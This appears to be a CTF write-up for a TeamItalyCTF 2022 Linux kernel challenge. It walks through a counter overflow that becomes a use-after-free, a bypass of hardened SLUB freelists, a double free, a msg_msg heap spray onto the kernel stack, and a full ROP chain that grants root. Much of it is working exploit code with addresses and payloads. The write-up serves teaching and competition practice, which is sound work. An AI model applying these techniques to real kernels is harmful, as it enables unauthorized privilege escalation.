Kernel - Family recipes
- Category: Kernel Pwn
- Vuln type: use-after-free / SLUB / freelist manipulation / KROP
- Solves: 1
This writeup documents my solution for this challenge, part of the TeamItalyCTF 2022.
The challenge contains a kernel module that controls a small device exposing an allocator for “recipes”.
The vuln chain abuses an unsigned-char counter overflow + krealloc
semantics to create a use-after-free of the
recipes_list
array, then corrupts kernel freelists within the SLUB allocator and eventually overlaps a
controlled allocation over the stack to install a ROP chain that calls prepare_kernel_cred(0) and commit_creds()
elevating the execution to ring 0 and iretq’s back to a userspace get_shell()
.
The challenge
- Target: x86_64 Linux kernel built without KASLR
- Kernel config: CONFIG_SLAB_FREELIST_HARDENED present.
- No KASAN, SMEP or SMAP protections.
This challenge shipped a tiny Linux kernel module that registers a device /dev/chall
acting as a "recipe manager."
Allows you to allocate recipes, delete them, and read their contents.
The central data structure is a global manager
object with two fields:
struct manager {
unsigned char num_of_recipes;
recipe_t **recipes_list;
};
The manager is responsible for keeping pointers to recipe_t
objects with the following layout:
typedef struct recipe {
char *buf;
unsigned long bufsize;
unsigned int public;
uid_t owner_uid;
} recipe_t;
The code section responsible for the allocation of a new recipe is the most interesting part:
idx = manager.num_of_recipes;
manager.num_of_recipes++;
if (manager.recipes_list == NULL) {
tmp = kmalloc(sizeof(recipe_t *) * manager.num_of_recipes, GFP_KERNEL);
} else {
tmp = krealloc(manager.recipes_list,
sizeof(recipe_t *) * manager.num_of_recipes,
GFP_KERNEL);
}
if (ZERO_OR_NULL_PTR(tmp)) {
printk(KERN_INFO "[ERR] (Re)allocation failed\n");
manager.num_of_recipes--;
goto error;
}
manager.recipes_list = tmp;
recipe = kmalloc(sizeof(recipe_t), GFP_KERNEL);
buf = kmalloc(request.alloc.bufsize + 1, GFP_KERNEL);
recipe->buf = buf;
manager.recipes_list[idx] = recipe;
Here we have the main bug of the module. Notice how num_of_recipes
is only an unsigned char
. The number of recipes allocation in not limited, so after 255 allocations, incrementing the counter wraps it back to 0. That means:
krealloc(manager.recipes_list, sizeof(recipe_t*) * 0, GFP_KERNEL);
This is effectively krealloc(ptr, 0)
, which is defined to free the old allocation and return either NULL
or a tiny pointer. If it returns NULL
, the code logs an error but crucially does not clear the stale pointer. manager.recipes_list
still points to freed memory, and the module continues to index into it. This dangling pointer is the entry point to exploitation.
Exploit
Since this challenge is build without KASLR enabled, the address of functions, gadgets, and heap objects can be easily found reading the file /proc/kallsyms
.
To make the exploitation faster and I implemented small wrappers for the device operations. Each one mirrors a kernel ioctl but hides the boilerplate, making it easier to chain primitives:
* alloc_recipe
allocates a recipe and writes attacker-controlled data.
* free_recipe
deletes a recipe at a given index.
* read_recipe
returns raw bytes from a recipe’s buffer, perfect for leaking heap metadata.
* info_recipe
returns the metadata of the recipe such as bufsize
,owner_uid
and public
.
void dev_alloc(char* buf, unsigned long bufsize, unsigned int public ){
request_t req;
req.alloc.buf = buf;
req.alloc.bufsize = bufsize;
req.alloc.public = public;
if (ioctl(fd, CMD_ALLOC, &req) < 0)
perror("ioctl CMD_ALLOC");
}
void dev_delete(unsigned long idx ){
request_t req;
req.delete.idx = idx;
if (ioctl(fd, CMD_DELETE, &req) < 0)
perror("ioctl CMD_DELETE");
}
void dev_read(char* buf, unsigned long bufsize, unsigned long idx ){
request_t req;
req.read.buf = buf;
req.read.bufsize = bufsize;
req.read.idx = idx;
if (ioctl(fd, CMD_READ, &req) < 0)
perror("ioctl CMD_READ");
}
request_t dev_info(unsigned long idx ){
request_t req;
req.info.idx = idx;
if (ioctl(fd, CMD_INFO, &req) < 0)
perror("ioctl CMD_INFO");
return req;
}
Integer overflow and UAF
Step one is simple: allocate 255 + 1 recipes .
After the 256th allocation, the counter overflows, krealloc(..., 0)
frees the array, and recipes_list
dangles. From now on, any operation that expects a valid pointer will instead dereference freed memory. The size and content of the payload is not important for now.
for (int i = 0; i < 256; i++) {
alloc_recipe(fd, 0x100, payload);
}
At this point the array has grew past 1k Bytes by some time and ended up allocated on the 2k general-purpouse slab.
The freed slot is linked back on the slab freelist, ready to be reused by attacker-controlled allocations.
Overlapping controlled data
Given that each recipe also contains a recipe->buf
allocated with user-chosen size, we can allocate new buffers that overlap with the freed recipes_list
region. By doing this, writing into the buffer effectively overwrites entries of the recipes_list
array.
In order for our buffer to be allocated from the 2k slab free list we need to request an object of at least 1025 Bytes, and even tough the MAX_BUFSIZE is 1024 the kernel module adds 1 Byte for the string terminator 0x00
allowing us to request from kmalloc exactly 1025 Bytes
buf = kmalloc(sizeof(char) * request.alloc.bufsize + 1, GFP_KERNEL);
That gives us control over the first 128 recipes_list[i]
pointers. If we set one to point to a fake recipe_t
under our control, the module will happily use it.
Leaking the freelist secret
The objective now is to insert a fake chunk into the free list. However, due to a mitigation built into the kernel,
we cannot directly modify the FD
pointer of a freed object.
We first need to obfuscate the pointer to the target memory we want to overlap. To do that, we must leak the secret used for the obfuscation.
The mitigation is CONFIG_SLAB_FREELIST_HARDENED
and by reading the linux source code
we can easily see what it does. Instead of storing the raw pointer next
inside the free object, the allocator
xors it with its address in memory and a per-cache or per-cpu secret (obf = next ^ swab(&next) ^ secret
) before writing it to memory; When the allocator consumes the pointer the same operation is perfomed.
The swab
function simply performs a byte-wise reversal of the pointer’s value. Each byte is mirrored end-to-end, so the most significant byte becomes the least significant, the second most significant becomes the second least, and so on.
// obfuscation
stored = next ^ swab(&next) ^ secret
// deobfuscation
next = stored ^ swab(&stored) ^ secret
static inline freeptr_t freelist_ptr_encode(const struct kmem_cache *s,
void *ptr, unsigned long ptr_addr)
{
unsigned long encoded;
#ifdef CONFIG_SLAB_FREELIST_HARDENED
encoded = (unsigned long)ptr ^ s->random ^ swab(ptr_addr);
#else
encoded = (unsigned long)ptr;
#endif
return (freeptr_t){.v = encoded};
}
There is a subtle problem here. If we can leak the content of the last free chunk in the free list, we already know that the original next pointer for that chunk is 0x0 (since it’s the end of the list). If we also know the address of that chunk, we can trivially derive the secret used in the pointer obfuscation:
secret = obfuscated ^ swab(address) ^ 0x00
In our case, given that KASLR is disabled, it's even easier because we already know the adress of every FD
pointer we know where it is pointing to in memory. All we need is a way to read the content of a free object.
Luckily, the module provides a read primitive that allows to leak arbitrary meory locations:
} else if (cmd == CMD_INFO) {
request.info.bufsize = recipe->bufsize;
request.info.owner_uid = recipe->owner_uid;
request.info.public = recipe->public;
if (copy_to_user(( request_t*)arg, (const request_t*)&request, sizeof(request))) {
printk(KERN_INFO "[CHALL] [ERR] Copy to user failed\n");
goto error;
}
If we arrange one of the recipes_list[idx]
we overwrote to point into freed slab memory, so that the
recipe->bufsize
overlaps with obfuscated freelist pointer, we can call dev_info()
to leak the pointer.
Given that KASLR is diabled we also know the address of the chunk we freed and where it points to, we can always reverse the encoding and recover the secret.
memset(msg, 0x41, 1024);
*((unsigned long*)msg+0) = 0xffff888003b75bf8; // ptr to the leak (minus 0x8)
dev_alloc(msg,1024,1);
// Leaking the obfuscated pointer in the freelist
request_t req = dev_info(0);
// extracting secret
unsigned long encrypted = req.info.bufsize;
unsigned long decrypted = 0xffff888003b76000;
unsigned long position = 0xffff888003b75c00;
unsigned long secret = encrypted ^ swab64(position) ^ decrypted;
Forging a freelist entry
Given that we can't modify recipes already allocated, if we want to inject into the freelist our pointer we
now also need a double-free, that would allow us to request the same object
twice, changing the next
pointer and inserting our fake chunk into the freelist.
To achieve this we could simply overwrite entries in recipes_list[]
so the module ends up calling kfree()
on the
same object twice (i.e., point two different array slots at the same address and call CMD_DELETE on both).
Before that we need to consider the following mitigation present in the kernel function set_freepointer()
invoked by kfree()
static inline void set_freepointer(struct kmem_cache *s, void *object, void *fp)
{
unsigned long freeptr_addr = (unsigned long)object + s->offset;
#ifdef CONFIG_SLAB_FREELIST_HARDENED
BUG_ON(object == fp); /* naive detection of double free or corruption */
#endif
freeptr_addr = (unsigned long)kasan_reset_tag((void *)freeptr_addr);
*(freeptr_t *)freeptr_addr = freelist_ptr_encode(s, fp, freeptr_addr);
}
That BUG_ON(object == fp)
simply compares the address being freed with the current freelist head —
it will catch the trivial case where kfree(obj)
is immediately followed by kfree(obj)
again.
But it doesn’t catch more subtle sequences where the same object is freed twice with other frees happening
in-between, because the freelist head will have changed.
To exploit reliably we can craft a fake recipe_t
structure intentionally placed at the start of the (freed)
array and then make another array entry point to it. The fake struct we write into the overlapped
recipes_list
region looks like a normal recipe_t
but with recipe->buf
set to a pointer of another valid memory location.
The freeing order matters: we first free the overlapping object that occupies the beginning of the array
(so the slot with our fake struct is now over a free object), and then we delete the fake recipe
struct itself.
Because the fake recipe
has a valid recipe->buf
pointer, the program frees the buffer first and only then
frees the struct body. Crucially, the immediate check BUG_ON(object == fp)
does not trigger because these
last two frees are not targeting the same memory location.
Once that forged entry sits in the freelist, normal kmallocs of the same size will eventually pop it and return an object at that location without further checks.
// Allocated recipe buffer over the array clearing 128 entries and inserting fake struct
memset(msg, 0x41, 1024);
*((unsigned long*)msg) = 0xffff888003b75800; //
*((unsigned long*)msg+1) = 8; // fake struct to do the double free
*((unsigned long*)msg+2) = 0x000003e800000001; //
*((unsigned long*)msg+4) = 0xffff888003b75000; // ptr to the fake struct for the double free (idx 4)
*((unsigned long*)msg+6) = 0xffff888003b75bf8; // ptr to the fake struct for the leak (idx 6)
dev_alloc(msg,1024,1);
// Leaking the obfuscated pointer in the freelist
request_t req = dev_info(6);
// extracting secret
unsigned long encrypted = req.info.bufsize;
unsigned long decrypted = 0xffff888003b76000;
unsigned long position = 0xffff888003b75c00;
unsigned long secret = encrypted ^ swab64(position) ^ decrypted;
// freeing the object overlapping the array
dev_delete(254);
// DOUBLE FREE! Freed again the second last free chunk and then last chunk
dev_delete(4);
Allocating onto the kernel stack
At this stage, the object at the head of the 2k freelist is linked twice in the list.
We now need to request it once and modify the content of its FD
pointer.
Allocating a regular recipe here won’t work because we are allowed to write a maximum of 1024 bytes so the position of the FD
pointer is out of reach.
Fortunately, we can leverage other kernel structures, such as msg_msg
. Using IPC messages,
we have full control over the size of the msg_msg
struct allocated when enqueuing a message.
And given that contains user input, it will be requested from the same general purpose cache.
The FD
pointer is located at offset 0x400
. Accounting for the msg_msg
header (0x30
) and the extra 8 bytes expected by msgsnd
at the start of the message, the final offset becomes:
0x400 - 0x30 + 0x8 = 0x3d8
Without KASLR, we can insert an object into the freelist such that it lands exactly on the stack, starting from the return address of copy_from_user()
.
unsigned long stack_end = 0xffffc900001d0000;
unsigned long target = stack_end- 0x410;
unsigned long obfuscated = target ^ swab64(0xffff888003b75400) ^ secret;
memset(msg, 0x41, 984);
*(unsigned long*)(msg+974 + 8) = obfuscated;
key_t key = ftok("/", 0);
printf("key:%d\n",key);
int msgid = msgget(key, 0666 | IPC_CREAT);
if (msgid == -1) { perror("msgget"); }
if (msgsnd(msgid, &msg, 984, 0)== -1) {
perror("msgsnd");
}
Kernel ROP
Before triggering the ROP chain we need to save the program state for the iretq
that will pop CS
SS
RSP
and RFLAGS
.
long user_cs;
long user_ss;
long user_sp;
long user_rflags;
void save_state(){
__asm__(
".intel_syntax noprefix;"
"mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;"
".att_syntax;"
);
puts("[*] Saved state");
}
save_state();
We also need an handler to execute when returning back to userland.
void get_shell(int sig){
puts("[*] Returned to userland");
system("/bin/sh");
}
signal(SIGSEGV, get_shell);
Now we can create more recipes and request objects of size 2k until we end up on the stack and insert a ROP that does the following:
-
Setup & call
prepare_kernel_cred(0)
that returns acred *
inrax
representing root credentials. -
Call
commit_creds(rax)
to replace the current task credentials with the new root credentials. -
Call
spin_unlock(&lock)
function to release the kernel lock that is still present onlock
-
Execute
swapgs; ret
to restore the GS base appropriate for returning to user mode (required before aniretq
). -
Return to userland safely with
iretq
building a fake iretq stack frame on the kernel stack:[RIP = get_shell, CS, RFLAGS, RSP, SS]
.
memset(msg, 0xff, 1024);
*(unsigned long*)(msg) = 0xffffffff8106ab4d; // pop rdi; ret;
unsigned long* rop = (unsigned long*)(msg+688);
int k = 0;
rop[k++] = 0xffffffff8106ab4d; // pop rdi; ret;
rop[k++] = 0x00;
rop[k++] = 0xffffffff81096110; // prepare_kernel_cred(0)
rop[k++] = 0xffffffff8102b013; // pop rcx; ret;
rop[k++] = stack_end- 0x410; // where i put the "pop rdi" gadget address before
rop[k++] = 0xffffffff812d5b52; // push rax; jmp qword ptr [rcx];
rop[k++] = 0xffffffff81095c30; // commit_creds(prepare_kernel_cred(0))
rop[k++] = 0xffffffff8106ab4d; // pop rdi; ret;
rop[k++] = 0xffffffffc00024d0; // &lock;
rop[k++] = 0xffffffff81ca0580; // spin_unlock
rop[k++] = 0xffffffff81c93263; // swapgs; ret
rop[k++] = 0xffffffff8102b4df; // iretq; ret;
rop[k++] = (unsigned long)get_shell;
rop[k++] = user_cs;
rop[k++] = user_rflags;
rop[k++] = user_sp;
rop[k++] = user_ss;
dev_alloc(msg,1024,1);